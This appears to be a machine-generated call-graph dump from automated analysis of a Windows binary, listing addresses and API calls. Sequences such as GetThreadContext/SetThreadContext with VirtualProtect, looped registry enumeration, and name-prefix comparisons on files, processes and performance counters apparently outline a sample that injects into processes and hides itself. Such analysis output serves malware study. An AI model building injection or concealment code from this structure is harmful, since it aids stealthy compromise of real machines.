15338 2527dee1afe StrCmpNIW 15337->15338 15339 2527dee1b3d 15337->15339 15338->15339 15340 2527dee1b18 lstrlenW 15338->15340 15339->15333 15340->15339 15341 2527dee1b2a StrCpyW 15340->15341 15341->15339 15343 2527dee3faa 15342->15343 15344 2527dee3f95 StrCmpNIW 15342->15344 15343->15333 15344->15343 15346 2527dee3751 PathCombineW 15345->15346 15347 2527dee373a StrCpyW StrCatW 15345->15347 15348 2527dee375a 15346->15348 15347->15348 15348->15333 15350 2527dee1deb 15349->15350 15352 2527dee1df4 15349->15352 15351 2527dee1530 2 API calls 15350->15351 15351->15352 15352->15333 17695 2527deef6dc 17696 2527deef6e8 17695->17696 17698 2527deef70f 17696->17698 17699 2527def1c0c 17696->17699 17700 2527def1c11 17699->17700 17701 2527def1c4c 17699->17701 17702 2527def1c44 17700->17702 17703 2527def1c32 DeleteCriticalSection 17700->17703 17701->17696 17704 2527deed2a0 __free_lconv_mon 13 API calls 17702->17704 17703->17702 17703->17703 17704->17701 17705 2527dee2ed8 17707 2527dee2f35 17705->17707 17706 2527dee2f50 17707->17706 17708 2527dee38a8 3 API calls 17707->17708 17708->17706 15353 2527deec1d8 15354 2527deec1f1 15353->15354 15355 2527deec209 15353->15355 15354->15355 15356 2527deed2a0 __free_lconv_mon 13 API calls 15354->15356 15356->15355 16678 2527deeb0d4 16685 2527deeb007 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 16678->16685 16679 2527deeb0fb 16680 2527dee9324 __CxxCallCatchBlock 9 API calls 16679->16680 16682 2527deeb100 16680->16682 16681 2527deeb10b __FrameHandler3::GetHandlerSearchState 16682->16681 16683 2527dee9324 __CxxCallCatchBlock 9 API calls 16682->16683 16683->16681 16684 2527dee99cc 9 API calls Is_bad_exception_allowed 16684->16685 16685->16679 16685->16681 16685->16684 16687 2527dee99f4 16685->16687 16688 2527dee9324 __CxxCallCatchBlock 9 API calls 16687->16688 16689 2527dee9a02 16688->16689 16689->16685 17193 2527dee2ff0 17194 2527dee3061 17193->17194 17195 2527dee3384 17194->17195 17196 2527dee308d GetModuleHandleA 17194->17196 17197 2527dee30b1 17196->17197 17198 2527dee309f GetProcAddress 17196->17198 17197->17195 17199 2527dee30d8 StrCmpNIW 17197->17199 17198->17197 17199->17195 17200 2527dee30fd 17199->17200 17200->17195 17201 2527dee1a30 6 API calls 17200->17201 17202 2527dee32b9 lstrlenW 17200->17202 17203 2527dee320f lstrlenW 17200->17203 17204 2527dee1cfc StrCmpIW StrCmpW 17200->17204 17205 2527dee3f88 StrCmpNIW 17200->17205 17201->17200 17202->17200 17203->17200 17204->17200 17205->17200 16702 2527deeacec 16705 2527dee90c0 16702->16705 16704 2527deead15 16706 2527dee90e1 16705->16706 16707 2527dee9116 16705->16707 16706->16707 16708 2527deec328 __std_exception_copy 38 API calls 16706->16708 16707->16704 16708->16707 17206 2527deeb7ea 17207 2527deec2f4 14 API calls 17206->17207 17208 2527deeb7ef 17207->17208 17209 2527deeb85f 17208->17209 17210 2527deeb815 GetModuleHandleW 17208->17210 17223 2527deeb6f8 17209->17223 17210->17209 17214 2527deeb822 17210->17214 17214->17209 17218 2527deeb904 GetModuleHandleExW 17214->17218 17219 2527deeb938 GetProcAddress 17218->17219 17220 2527deeb94a 17218->17220 17219->17220 17221 2527deeb95b FreeLibrary 17220->17221 17222 2527deeb962 17220->17222 17221->17222 17222->17209 17235 2527deec558 EnterCriticalSection 17223->17235 17236 2527dee27e8 17237 2527dee2867 17236->17237 17238 2527dee28c9 GetFileType 17237->17238 17250 2527dee2998 17237->17250 17239 2527dee28ed 17238->17239 17240 2527dee28d7 StrCpyW 17238->17240 17242 2527dee1ad4 4 API calls 17239->17242 17241 2527dee28fc 17240->17241 17243 2527dee2906 17241->17243 17246 2527dee299d 17241->17246 17242->17241 17245 2527dee3f88 StrCmpNIW 17243->17245 17249 2527dee3708 4 API calls 17243->17249 17243->17250 17251 2527dee1dd4 2 API calls 17243->17251 17244 2527dee3f88 StrCmpNIW 17244->17246 17245->17243 17246->17244 17247 2527dee3708 4 API calls 17246->17247 17248 2527dee1dd4 2 API calls 17246->17248 17246->17250 17247->17246 17248->17246 17249->17243 17251->17243 15361 2527df125dc 15362 2527df1265a 15361->15362 15363 2527df126bf GetFileType 15362->15363 15370 2527df12777 15362->15370 15364 2527df126cd StrCpyW 15363->15364 15365 2527df126e1 15363->15365 15368 2527df126ee 15364->15368 15372 2527df11ad4 GetFinalPathNameByHandleW 15365->15372 15368->15370 15377 2527df13f88 15368->15377 15380 2527df13708 StrCmpIW 15368->15380 15384 2527df11dd4 15368->15384 15373 2527df11b3d 15372->15373 15374 2527df11afe StrCmpNIW 15372->15374 15373->15368 15374->15373 15375 2527df11b18 lstrlenW 15374->15375 15375->15373 15376 2527df11b2a StrCpyW 15375->15376 15376->15373 15378 2527df13f95 StrCmpNIW 15377->15378 15379 2527df13faa 15377->15379 15378->15379 15379->15368 15381 2527df1373a StrCpyW StrCatW 15380->15381 15382 2527df13751 PathCombineW 15380->15382 15383 2527df1375a 15381->15383 15382->15383 15383->15368 15385 2527df11deb 15384->15385 15386 2527df11df4 15384->15386 15388 2527df11530 15385->15388 15386->15368 15389 2527df11580 15388->15389 15392 2527df1154a 15388->15392 15389->15386 15390 2527df11569 StrCmpW 15390->15392 15391 2527df11561 StrCmpIW 15391->15392 15392->15389 15392->15390 15392->15391 17252 2527deef3e4 17253 2527deef41d 17252->17253 17254 2527deef3ee 17252->17254 17254->17253 17255 2527deef403 FreeLibrary 17254->17255 17255->17254 17256 2527def33e4 17257 2527def33fb 17256->17257 17258 2527def33f5 CloseHandle 17256->17258 17258->17257 17259 2527dee63e3 17260 2527dee63f0 17259->17260 17261 2527dee63fc GetThreadContext 17260->17261 17266 2527dee655a 17260->17266 17262 2527dee6422 17261->17262 17261->17266 17262->17266 17267 2527dee6449 17262->17267 17263 2527dee6581 VirtualProtect FlushInstructionCache 17263->17266 17264 2527dee663e 17265 2527dee665e 17264->17265 17270 2527dee4b20 VirtualFree 17264->17270 17268 2527dee5530 3 API calls 17265->17268 17266->17263 17266->17264 17269 2527dee64cd 17267->17269 17271 2527dee64a6 SetThreadContext 17267->17271 17274 2527dee6663 17268->17274 17270->17265 17271->17269 17272 2527dee66b7 17275 2527dee8070 _invalid_parameter_noinfo 8 API calls 17272->17275 17273 2527dee6677 ResumeThread 17273->17274 17274->17272 17274->17273 17276 2527dee66ff 17275->17276 15393 2527dee81c0 15395 2527dee81c9 __scrt_release_startup_lock 15393->15395 15394 2527dee81cd 15395->15394 15397 2527deebbb4 15395->15397 15398 2527deebbd4 15397->15398 15425 2527deebbed 15397->15425 15399 2527deebbdc 15398->15399 15400 2527deebbf2 15398->15400 15401 2527deed1f4 __free_lconv_mon 13 API calls 15399->15401 15429 2527deee864 15400->15429 15403 2527deebbe1 15401->15403 15426 2527deed04c 15403->15426 15412 2527deebc7a 15415 2527deeb994 14 API calls 15412->15415 15413 2527deebc69 15414 2527deed1f4 __free_lconv_mon 13 API calls 15413->15414 15424 2527deebc6e 15414->15424 15416 2527deebc96 15415->15416 15418 2527deebcdf 15416->15418 15419 2527deebcc6 15416->15419 15416->15424 15417 2527deed2a0 __free_lconv_mon 13 API calls 15417->15425 15422 2527deed2a0 __free_lconv_mon 13 API calls 15418->15422 15420 2527deed2a0 __free_lconv_mon 13 API calls 15419->15420 15421 2527deebccf 15420->15421 15423 2527deed2a0 __free_lconv_mon 13 API calls 15421->15423 15422->15424 15423->15425 15424->15417 15425->15394 15459 2527deecef8 15426->15459 15430 2527deee871 15429->15430 15431 2527deebbf7 15429->15431 15559 2527deecacc 15430->15559 15435 2527deedf38 GetModuleFileNameW 15431->15435 15433 2527deee8a0 15564 2527deee53c 15433->15564 15436 2527deedf91 15435->15436 15437 2527deedf7d GetLastError 15435->15437 15439 2527deedd78 14 API calls 15436->15439 15755 2527deed184 15437->15755 15441 2527deedfbf 15439->15441 15440 2527deedf8a 15443 2527dee8070 _invalid_parameter_noinfo 8 API calls 15440->15443 15444 2527deedfd0 15441->15444 15760 2527deef198 15441->15760 15446 2527deebc0e 15443->15446 15764 2527deede1c 15444->15764 15447 2527deeb994 15446->15447 15449 2527deeb9d2 15447->15449 15451 2527deeba38 15449->15451 15781 2527deeec1c 15449->15781 15450 2527deebb25 15453 2527deebb54 15450->15453 15451->15450 15452 2527deeec1c 14 API calls 15451->15452 15452->15451 15454 2527deebb6c 15453->15454 15455 2527deebba4 15453->15455 15454->15455 15456 2527deed220 __free_lconv_mon 13 API calls 15454->15456 15455->15412 15455->15413 15457 2527deebb9a 15456->15457 15458 2527deed2a0 __free_lconv_mon 13 API calls 15457->15458 15458->15455 15460 2527deecf23 15459->15460 15467 2527deecf94 15460->15467 15462 2527deecf4a 15464 2527deecf6d 15462->15464 15477 2527deec3e0 15462->15477 15465 2527deecf82 15464->15465 15466 2527deec3e0 _invalid_parameter_noinfo 17 API calls 15464->15466 15465->15425 15466->15465 15490 2527deeccc8 15467->15490 15473 2527deecfcf 15473->15462 15478 2527deec3ef GetLastError 15477->15478 15479 2527deec438 15477->15479 15480 2527deec404 15478->15480 15479->15464 15481 2527deecba0 _invalid_parameter_noinfo 14 API calls 15480->15481 15482 2527deec41e SetLastError 15481->15482 15482->15479 15483 2527deec441 15482->15483 15484 2527deec3e0 _invalid_parameter_noinfo 15 API calls 15483->15484 15485 2527deec467 15484->15485 15530 2527deeffe8 15485->15530 15491 2527deecd1f 15490->15491 15492 2527deecce4 GetLastError 15490->15492 15491->15473 15496 2527deecd34 15491->15496 15493 2527deeccf4 15492->15493 15503 2527deecba0 15493->15503 15497 2527deecd50 GetLastError SetLastError 15496->15497 15498 2527deecd68 15496->15498 15497->15498 15498->15473 15499 2527deed06c IsProcessorFeaturePresent 15498->15499 15500 2527deed07f 15499->15500 15508 2527deecd80 15500->15508 15504 2527deecbc8 FlsGetValue 15503->15504 15506 2527deecbc4 15503->15506 15504->15506 15505 2527deecbde SetLastError 15505->15491 15506->15505 15507 2527deec940 __free_lconv_mon 13 API calls 15506->15507 15507->15505 15509 2527deecdba _invalid_parameter_noinfo 15508->15509 15510 2527deecde2 RtlCaptureContext RtlLookupFunctionEntry 15509->15510 15511 2527deece2e RtlVirtualUnwind 15510->15511 15512 2527deece64 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15510->15512 15511->15512 15513 2527deeceb6 _invalid_parameter_noinfo 15512->15513 15516 2527dee8070 15513->15516 15518 2527dee8079 15516->15518 15517 2527dee8084 GetCurrentProcess TerminateProcess 15518->15517 15519 2527dee8848 IsProcessorFeaturePresent 15518->15519 15520 2527dee8860 15519->15520 15525 2527dee891c RtlCaptureContext 15520->15525 15526 2527dee8936 RtlLookupFunctionEntry 15525->15526 15527 2527dee894c RtlVirtualUnwind 15526->15527 15528 2527dee8873 15526->15528 15527->15526 15527->15528 15529 2527dee8814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 15528->15529 15531 2527def0001 15530->15531 15533 2527deec48f 15530->15533 15531->15533 15538 2527def0a40 15531->15538 15534 2527def0054 15533->15534 15535 2527def006d 15534->15535 15536 2527deec49f 15534->15536 15535->15536 15556 2527deee8c4 15535->15556 15536->15464 15547 2527deecab0 15538->15547 15540 2527def0a4f 15546 2527def0a95 15540->15546 15555 2527deec558 EnterCriticalSection 15540->15555 15546->15533 15548 2527deecb10 __free_lconv_mon 13 API calls 15547->15548 15550 2527deecab9 15548->15550 15549 2527deecabe 15549->15540 15550->15549 15551 2527deecae8 FlsGetValue 15550->15551 15553 2527deecae4 15550->15553 15551->15553 15552 2527deecafe 15552->15540 15553->15552 15554 2527deec940 __free_lconv_mon 13 API calls 15553->15554 15554->15552 15557 2527deecab0 _invalid_parameter_noinfo 14 API calls 15556->15557 15558 2527deee8cd 15557->15558 15560 2527deecae8 FlsGetValue 15559->15560 15561 2527deecae4 15559->15561 15560->15561 15562 2527deecafe 15561->15562 15563 2527deec940 __free_lconv_mon 13 API calls 15561->15563 15562->15433 15563->15562 15587 2527deee7ac 15564->15587 15569 2527deee58e 15569->15431 15572 2527deee5a7 15573 2527deed2a0 __free_lconv_mon 13 API calls 15572->15573 15573->15569 15574 2527deee5b6 15574->15574 15613 2527deee8e0 15574->15613 15577 2527deee6b2 15578 2527deed1f4 __free_lconv_mon 13 API calls 15577->15578 15579 2527deee6b7 15578->15579 15581 2527deed2a0 __free_lconv_mon 13 API calls 15579->15581 15580 2527deee70d 15583 2527deee774 15580->15583 15624 2527deee05c 15580->15624 15581->15569 15582 2527deee6cc 15582->15580 15586 2527deed2a0 __free_lconv_mon 13 API calls 15582->15586 15585 2527deed2a0 __free_lconv_mon 13 API calls 15583->15585 15585->15569 15586->15580 15588 2527deee7cf 15587->15588 15593 2527deee7d9 15588->15593 15639 2527deec558 EnterCriticalSection 15588->15639 15595 2527deecacc 14 API calls 15593->15595 15598 2527deee571 15593->15598 15596 2527deee8a0 15595->15596 15597 2527deee53c 56 API calls 15596->15597 15597->15598 15599 2527deee22c 15598->15599 15640 2527deedd78 15599->15640 15601 2527deee240 15602 2527deee25e 15601->15602 15603 2527deee24c GetOEMCP 15601->15603 15604 2527deee263 GetACP 15602->15604 15605 2527deee273 15602->15605 15603->15605 15604->15605 15605->15569 15606 2527deec5d0 15605->15606 15607 2527deec61b 15606->15607 15611 2527deec5df __free_lconv_mon 15606->15611 15608 2527deed1f4 __free_lconv_mon 13 API calls 15607->15608 15610 2527deec619 15608->15610 15609 2527deec602 HeapAlloc 15609->15610 15609->15611 15610->15572 15610->15574 15611->15607 15611->15609 15612 2527deeb470 __free_lconv_mon 2 API calls 15611->15612 15612->15611 15614 2527deee22c 16 API calls 15613->15614 15615 2527deee91b 15614->15615 15616 2527deeea71 15615->15616 15618 2527deee958 IsValidCodePage 15615->15618 15623 2527deee972 15615->15623 15617 2527dee8070 _invalid_parameter_noinfo 8 API calls 15616->15617 15619 2527deee6a9 15617->15619 15618->15616 15620 2527deee969 15618->15620 15619->15577 15619->15582 15621 2527deee998 GetCPInfo 15620->15621 15620->15623 15621->15616 15621->15623 15656 2527deee344 15623->15656 15754 2527deec558 EnterCriticalSection 15624->15754 15641 2527deedd9c 15640->15641 15642 2527deedd97 15640->15642 15641->15642 15643 2527deecab0 _invalid_parameter_noinfo 14 API calls 15641->15643 15642->15601 15644 2527deeddb7 15643->15644 15648 2527deeffb4 15644->15648 15649 2527deeddda 15648->15649 15650 2527deeffc9 15648->15650 15652 2527def0020 15649->15652 15650->15649 15651 2527def0a40 _invalid_parameter_noinfo 14 API calls 15650->15651 15651->15649 15653 2527def0048 15652->15653 15654 2527def0035 15652->15654 15653->15642 15654->15653 15655 2527deee8c4 _invalid_parameter_noinfo 14 API calls 15654->15655 15655->15653 15657 2527deee38f GetCPInfo 15656->15657 15666 2527deee485 15656->15666 15659 2527deee3a2 15657->15659 15657->15666 15658 2527dee8070 _invalid_parameter_noinfo 8 API calls 15661 2527deee524 15658->15661 15667 2527def1474 15659->15667 15661->15616 15666->15658 15668 2527deedd78 14 API calls 15667->15668 15669 2527def14b6 15668->15669 15687 2527deeec58 15669->15687 15689 2527deeec61 MultiByteToWideChar 15687->15689 15778 2527deed1d0 15755->15778 15757 2527deed191 __free_lconv_mon 15758 2527deed1f4 __free_lconv_mon 13 API calls 15757->15758 15759 2527deed1a1 15758->15759 15759->15440 15761 2527deef1a9 15760->15761 15762 2527deef1ca 15760->15762 15761->15762 15763 2527deeef88 9 API calls 15761->15763 15762->15444 15763->15762 15765 2527deede40 15764->15765 15766 2527deede5b 15764->15766 15765->15440 15767 2527deeece8 WideCharToMultiByte 15766->15767 15768 2527deede60 15766->15768 15769 2527deedeb7 15767->15769 15768->15765 15770 2527deed1f4 __free_lconv_mon 13 API calls 15768->15770 15769->15768 15771 2527deedebe GetLastError 15769->15771 15773 2527deedee9 15769->15773 15770->15765 15772 2527deed184 13 API calls 15771->15772 15775 2527deedecb 15772->15775 15774 2527deeece8 WideCharToMultiByte 15773->15774 15776 2527deedf10 15774->15776 15777 2527deed1f4 __free_lconv_mon 13 API calls 15775->15777 15776->15765 15776->15771 15777->15765 15779 2527deecb10 __free_lconv_mon 13 API calls 15778->15779 15780 2527deed1d9 15779->15780 15780->15757 15782 2527deeeba8 15781->15782 15783 2527deedd78 14 API calls 15782->15783 15784 2527deeebcc 15783->15784 15784->15449 17286 2527df11bc4 17293 2527df11724 GetProcessHeap HeapAlloc 17286->17293 17288 2527df11bd3 17289 2527df11bda Sleep 17288->17289 17292 2527df1159c StrCmpIW StrCmpW 17288->17292 17344 2527df119b0 17288->17344 17290 2527df11724 50 API calls 17289->17290 17290->17288 17292->17288 17361 2527df11264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 17293->17361 17295 2527df1174c 17362 2527df11000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 17295->17362 17297 2527df11754 17363 2527df11264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 17297->17363 17299 2527df1175d 17364 2527df11264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 17299->17364 17301 2527df11766 17365 2527df11264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 17301->17365 17303 2527df1176f 17366 2527df11000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 17303->17366 17305 2527df11778 17367 2527df11000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 17305->17367 17307 2527df11781 17368 2527df11000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 17307->17368 17309 2527df1178a RegOpenKeyExW 17310 2527df119a2 17309->17310 17311 2527df117bc RegOpenKeyExW 17309->17311 17310->17288 17312 2527df117e5 17311->17312 17313 2527df117fb RegOpenKeyExW 17311->17313 17369 2527df112b8 RegQueryInfoKeyW 17312->17369 17315 2527df11836 RegOpenKeyExW 17313->17315 17316 2527df1181f 17313->17316 17319 2527df1185a 17315->17319 17320 2527df11871 RegOpenKeyExW 17315->17320 17378 2527df1104c RegQueryInfoKeyW 17316->17378 17322 2527df112b8 16 API calls 17319->17322 17323 2527df11895 17320->17323 17324 2527df118ac RegOpenKeyExW 17320->17324 17328 2527df11867 RegCloseKey 17322->17328 17325 2527df112b8 16 API calls 17323->17325 17326 2527df118e7 RegOpenKeyExW 17324->17326 17327 2527df118d0 17324->17327 17329 2527df118a2 RegCloseKey 17325->17329 17331 2527df11922 RegOpenKeyExW 17326->17331 17332 2527df1190b 17326->17332 17330 2527df112b8 16 API calls 17327->17330 17328->17320 17329->17324 17333 2527df118dd RegCloseKey 17330->17333 17335 2527df11946 17331->17335 17336 2527df1195d RegOpenKeyExW 17331->17336 17334 2527df1104c 6 API calls 17332->17334 17333->17326 17337 2527df11918 RegCloseKey 17334->17337 17338 2527df1104c 6 API calls 17335->17338 17339 2527df11998 RegCloseKey 17336->17339 17340 2527df11981 17336->17340 17337->17331 17342 2527df11953 RegCloseKey 17338->17342 17339->17310 17341 2527df1104c 6 API calls 17340->17341 17343 2527df1198e RegCloseKey 17341->17343 17342->17336 17343->17339 17383 2527df114a0 17344->17383 17361->17295 17362->17297 17363->17299 17364->17301 17365->17303 17366->17305 17367->17307 17368->17309 17370 2527df11323 GetProcessHeap HeapAlloc 17369->17370 17371 2527df11486 RegCloseKey 17369->17371 17372 2527df11472 GetProcessHeap HeapFree 17370->17372 17373 2527df1134e RegEnumValueW 17370->17373 17371->17313 17372->17371 17374 2527df113a1 17373->17374 17374->17372 17374->17373 17375 2527df11530 2 API calls 17374->17375 17376 2527df1141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 17374->17376 17377 2527df113cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 17374->17377 17375->17374 17376->17374 17377->17376 17379 2527df111b5 RegCloseKey 17378->17379 17381 2527df110bf 17378->17381 17379->17315 17380 2527df110cf RegEnumValueW 17380->17381 17381->17379 17381->17380 17382 2527df1114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 17381->17382 17382->17381 17384 2527df114e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 17383->17384 17385 2527df114c2 GetProcessHeap HeapFree 17383->17385 17385->17384 17385->17385 16709 2527dee34b8 16710 2527dee34e8 16709->16710 16711 2527dee35a1 16710->16711 16712 2527dee3505 PdhGetCounterInfoW 16710->16712 16712->16711 16713 2527dee3523 GetProcessHeap HeapAlloc PdhGetCounterInfoW 16712->16713 16714 2527dee358d GetProcessHeap HeapFree 16713->16714 16715 2527dee3555 StrCmpW 16713->16715 16714->16711 16715->16714 16717 2527dee356a 16715->16717 16717->16714 16718 2527dee3950 StrCmpNW 16717->16718 16719 2527dee3982 StrStrW 16718->16719 16720 2527dee39f2 16718->16720 16719->16720 16721 2527dee399b StrToIntW 16719->16721 16720->16717 16721->16720 16722 2527dee39c3 16721->16722 16722->16720 16728 2527dee1a30 OpenProcess 16722->16728 16725 2527dee3f88 StrCmpNIW 16726 2527dee39e4 16725->16726 16726->16720 16734 2527dee1cfc 16726->16734 16729 2527dee1ab6 16728->16729 16730 2527dee1a64 K32GetModuleFileNameExW 16728->16730 16729->16720 16729->16725 16731 2527dee1a7e PathFindFileNameW lstrlenW 16730->16731 16732 2527dee1aad CloseHandle 16730->16732 16731->16732 16733 2527dee1a9c StrCpyW 16731->16733 16732->16729 16733->16732 16735 2527dee1d1c 16734->16735 16736 2527dee1d13 16734->16736 16735->16720 16737 2527dee1530 2 API calls 16736->16737 16737->16735 15785 2527df219d0 15788 2527df1e864 15785->15788 15789 2527df1e871 15788->15789 15793 2527df1e8b6 15788->15793 15794 2527df1cacc 15789->15794 15791 2527df1e8a0 15799 2527df1e53c 15791->15799 15795 2527df1cae8 FlsGetValue 15794->15795 15797 2527df1cae4 15794->15797 15795->15797 15796 2527df1cafe 15796->15791 15797->15796 15798 2527df1c940 __std_exception_copy 13 API calls 15797->15798 15798->15796 15822 2527df1e7ac 15799->15822 15804 2527df1e58e 15804->15793 15807 2527df1e5a7 15808 2527df1d2a0 __free_lconv_num 13 API calls 15807->15808 15808->15804 15809 2527df1e5b6 15809->15809 15848 2527df1e8e0 15809->15848 15812 2527df1e6b2 15813 2527df1d1f4 __std_exception_copy 13 API calls 15812->15813 15814 2527df1e6b7 15813->15814 15816 2527df1d2a0 __free_lconv_num 13 API calls 15814->15816 15815 2527df1e70d 15818 2527df1e774 15815->15818 15859 2527df1e05c 15815->15859 15816->15804 15817 2527df1e6cc 15817->15815 15820 2527df1d2a0 __free_lconv_num 13 API calls 15817->15820 15819 2527df1d2a0 __free_lconv_num 13 API calls 15818->15819 15819->15804 15820->15815 15823 2527df1e7cf 15822->15823 15829 2527df1e7d9 15823->15829 15874 2527df1c558 EnterCriticalSection 15823->15874 15828 2527df1e571 15834 2527df1e22c 15828->15834 15829->15828 15831 2527df1cacc 14 API calls 15829->15831 15832 2527df1e8a0 15831->15832 15833 2527df1e53c 56 API calls 15832->15833 15833->15828 15875 2527df1dd78 15834->15875 15837 2527df1e24c GetOEMCP 15840 2527df1e273 15837->15840 15838 2527df1e25e 15839 2527df1e263 GetACP 15838->15839 15838->15840 15839->15840 15840->15804 15841 2527df1c5d0 15840->15841 15842 2527df1c61b 15841->15842 15846 2527df1c5df __std_exception_copy 15841->15846 15843 2527df1d1f4 __std_exception_copy 13 API calls 15842->15843 15845 2527df1c619 15843->15845 15844 2527df1c602 HeapAlloc 15844->15845 15844->15846 15845->15807 15845->15809 15846->15842 15846->15844 15847 2527df1b470 __std_exception_copy 2 API calls 15846->15847 15847->15846 15849 2527df1e22c 16 API calls 15848->15849 15851 2527df1e91b 15849->15851 15850 2527df1ea71 15923 2527df18070 15850->15923 15851->15850 15853 2527df1e958 IsValidCodePage 15851->15853 15858 2527df1e972 15851->15858 15853->15850 15855 2527df1e969 15853->15855 15856 2527df1e998 GetCPInfo 15855->15856 15855->15858 15856->15850 15856->15858 15912 2527df1e344 15858->15912 16024 2527df1c558 EnterCriticalSection 15859->16024 15876 2527df1dd9c 15875->15876 15882 2527df1dd97 15875->15882 15876->15882 15883 2527df1cab0 15876->15883 15878 2527df1ddb7 15891 2527df1ffb4 15878->15891 15882->15837 15882->15838 15884 2527df1cb10 __std_exception_copy 13 API calls 15883->15884 15886 2527df1cab9 15884->15886 15885 2527df1cabe 15885->15878 15886->15885 15887 2527df1cae8 FlsGetValue 15886->15887 15889 2527df1cae4 15886->15889 15887->15889 15888 2527df1cafe 15888->15878 15889->15888 15890 2527df1c940 __std_exception_copy 13 API calls 15889->15890 15890->15888 15892 2527df1ffc9 15891->15892 15893 2527df1ddda 15891->15893 15892->15893 15899 2527df20a40 15892->15899 15895 2527df20020 15893->15895 15896 2527df20035 15895->15896 15898 2527df20048 15895->15898 15896->15898 15909 2527df1e8c4 15896->15909 15898->15882 15900 2527df1cab0 _invalid_parameter_noinfo 14 API calls 15899->15900 15901 2527df20a4f 15900->15901 15907 2527df20a95 15901->15907 15908 2527df1c558 EnterCriticalSection 15901->15908 15907->15893 15910 2527df1cab0 _invalid_parameter_noinfo 14 API calls 15909->15910 15911 2527df1e8cd 15910->15911 15913 2527df1e38f GetCPInfo 15912->15913 15922 2527df1e485 15912->15922 15915 2527df1e3a2 15913->15915 15913->15922 15914 2527df18070 _invalid_parameter_noinfo 8 API calls 15917 2527df1e524 15914->15917 15932 2527df21474 15915->15932 15917->15850 15922->15914 15924 2527df18079 15923->15924 15925 2527df18084 15924->15925 15926 2527df18848 IsProcessorFeaturePresent 15924->15926 15925->15812 15925->15817 15927 2527df18860 15926->15927 16019 2527df1891c RtlCaptureContext 15927->16019 15933 2527df1dd78 14 API calls 15932->15933 15934 2527df214b6 15933->15934 15952 2527df1ec58 15934->15952 15954 2527df1ec61 MultiByteToWideChar 15952->15954 16020 2527df18936 RtlLookupFunctionEntry 16019->16020 16021 2527df18873 16020->16021 16022 2527df1894c RtlVirtualUnwind 16020->16022 16023 2527df18814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16021->16023 16022->16020 16022->16021 17729 2527dee2ab4 TlsGetValue TlsGetValue TlsGetValue 17730 2527dee2b0d 17729->17730 17731 2527dee2b79 17729->17731 17730->17731 17732 2527dee2b15 17730->17732 17733 2527dee2b74 17731->17733 17734 2527dee2c32 TlsSetValue TlsSetValue TlsSetValue 17731->17734 17736 2527dee3f88 StrCmpNIW 17731->17736 17732->17733 17732->17734 17735 2527dee3f88 StrCmpNIW 17732->17735 17734->17733 17735->17732 17736->17731 16025 2527def19d0 16026 2527deee864 56 API calls 16025->16026 16027 2527def19d9 16026->16027 17391 2527dee5fcc 17394 2527dee5fd3 17391->17394 17392 2527dee6000 VirtualProtect 17393 2527dee6029 GetLastError 17392->17393 17395 2527dee5f10 17392->17395 17393->17395 17394->17392 17394->17395 14949 2527dee1bc4 14956 2527dee1724 GetProcessHeap HeapAlloc 14949->14956 14951 2527dee1bd3 14952 2527dee1bda SleepEx 14951->14952 14955 2527dee159c StrCmpIW StrCmpW 14951->14955 15007 2527dee19b0 14951->15007 14953 2527dee1724 50 API calls 14952->14953 14953->14951 14955->14951 15024 2527dee1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14956->15024 14958 2527dee174c 15025 2527dee1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14958->15025 14960 2527dee1754 15026 2527dee1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14960->15026 14962 2527dee175d 15027 2527dee1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14962->15027 14964 2527dee1766 15028 2527dee1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14964->15028 14966 2527dee176f 15029 2527dee1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14966->15029 14968 2527dee1778 15030 2527dee1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14968->15030 14970 2527dee1781 15031 2527dee1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14970->15031 14972 2527dee178a RegOpenKeyExW 14973 2527dee17bc RegOpenKeyExW 14972->14973 14974 2527dee19a2 14972->14974 14975 2527dee17fb RegOpenKeyExW 14973->14975 14976 2527dee17e5 14973->14976 14974->14951 14978 2527dee181f 14975->14978 14979 2527dee1836 RegOpenKeyExW 14975->14979 15032 2527dee12b8 RegQueryInfoKeyW 14976->15032 15041 2527dee104c RegQueryInfoKeyW 14978->15041 14980 2527dee1871 RegOpenKeyExW 14979->14980 14981 2527dee185a 14979->14981 14986 2527dee18ac RegOpenKeyExW 14980->14986 14987 2527dee1895 14980->14987 14985 2527dee12b8 16 API calls 14981->14985 14988 2527dee1867 RegCloseKey 14985->14988 14990 2527dee18d0 14986->14990 14991 2527dee18e7 RegOpenKeyExW 14986->14991 14989 2527dee12b8 16 API calls 14987->14989 14988->14980 14992 2527dee18a2 RegCloseKey 14989->14992 14993 2527dee12b8 16 API calls 14990->14993 14994 2527dee190b 14991->14994 14995 2527dee1922 RegOpenKeyExW 14991->14995 14992->14986 14998 2527dee18dd RegCloseKey 14993->14998 14999 2527dee104c 6 API calls 14994->14999 14996 2527dee195d RegOpenKeyExW 14995->14996 14997 2527dee1946 14995->14997 15002 2527dee1981 14996->15002 15003 2527dee1998 RegCloseKey 14996->15003 15001 2527dee104c 6 API calls 14997->15001 14998->14991 15000 2527dee1918 RegCloseKey 14999->15000 15000->14995 15004 2527dee1953 RegCloseKey 15001->15004 15005 2527dee104c 6 API calls 15002->15005 15003->14974 15004->14996 15006 2527dee198e RegCloseKey 15005->15006 15006->15003 15051 2527dee14a0 15007->15051 15024->14958 15025->14960 15026->14962 15027->14964 15028->14966 15029->14968 15030->14970 15031->14972 15033 2527dee1486 